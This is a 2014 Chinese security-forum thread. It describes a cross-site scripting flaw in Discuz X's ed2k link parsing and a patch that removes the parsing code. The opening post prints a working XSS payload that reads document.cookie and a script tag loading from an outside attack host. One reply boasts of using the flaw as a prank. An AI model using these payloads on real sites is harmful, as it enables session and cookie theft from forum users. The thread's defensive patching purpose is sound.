查看: 37682|回复: 46

【独家】关于Discuz X! 通杀XSS的处理办法

[复制链接]
  • TA的每日心情
    无聊
    2020-1-16 21:33
  • 签到天数: 175 天

    [LV.7]常住居民III

    发表于 2014-3-2 23:07:26 | 显示全部楼层 |阅读模式
    本帖最后由 Antergone 于 2014-3-3 00:12 编辑

    首先来个这段代码

    [AppleScript] 纯文本查看 复制代码
    ed2k://|file|test|'+alert(document.cookie)+'|test/


    这是一段电驴的连接。
    先说明一下这个XSS是不能进行钓鱼。在这里说一下原理

    我们的基础认证钓鱼肯定是这样的

    [AppleScript] 纯文本查看 复制代码
    <script src=http://xss.re/0001></script>


    ed2k的连接识别是这样的,从ed2k://开始到下一“/" 在上述的基础认证钓鱼的代码里面肯定是行不通的只能识别到http:

    所以说现在就要解决弹出cookies的问题了

    既然是ed2k惹的祸,我看很多论坛是给他加了参数。我这里有一个简单办法。

    很多会员共享的东西里面还是有用到电驴链接的,我们不能直接把他当做关键词屏蔽了。所以直接让ed2k不解析。让这个连接成为文本。

    查了下,discuz从X系列开始就可以ed2k自动解析

    修改文件你论坛根目录下source\function\function_discuzcode.php

    找到

    [PHP] 纯文本查看 复制代码
    if($allowbbcode)
     {
    if(strpos($msglower, 'ed2k://') !== FALSE) 
    {
    $message = preg_replace("/ed2k:\/\/(.+?)\//e", "parseed2k('\\1')", $message);
    }
    }
    

    删除了。

    然后

    游客,如果您要查看本帖隐藏内容请回复



    评分

    参与人数 1i币 +10 贡献 +2 收起 理由
    90_ + 10 + 2 支持原创

    查看全部评分

    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-3-2 23:08:38 | 显示全部楼层
    然后呢/?
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-3-2 23:08:58 | 显示全部楼层
    本帖隐藏的内容

    保存上传覆盖后更新缓存即可

    评分

    参与人数 1i币 +4 收起 理由
    蓝色_ + 4 雷锋

    查看全部评分

    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-3-3 00:35:56 | 显示全部楼层
    新漏洞?还是?

    点评

    这两天的  详情 回复 发表于 2014-3-3 00:44
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-1-16 21:33
  • 签到天数: 175 天

    [LV.7]常住居民III

     楼主| 发表于 2014-3-3 00:44:32 | 显示全部楼层
    风雨 发表于 2014-3-3 00:35
    新漏洞?还是?

    这两天的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-3-3 03:31:55 | 显示全部楼层
    诶呦 X的爽吧
    回复 支持 反对

    使用道具 举报

    头像被屏蔽

    该用户从未签到

    发表于 2014-3-3 05:12:45 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-3-3 06:33:02 | 显示全部楼层
    哈哈昨天我就恶作剧了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-6-22 13:45
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2014-3-3 07:17:47 | 显示全部楼层
    看看解决办法
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-3-13 17:03
  • 签到天数: 99 天

    [LV.6]常住居民II

    发表于 2014-3-3 09:32:06 | 显示全部楼层
    刚刚测试了下这个Xss,发现也不怎么好用的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 09:15 , Processed in 0.034299 second(s), 18 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部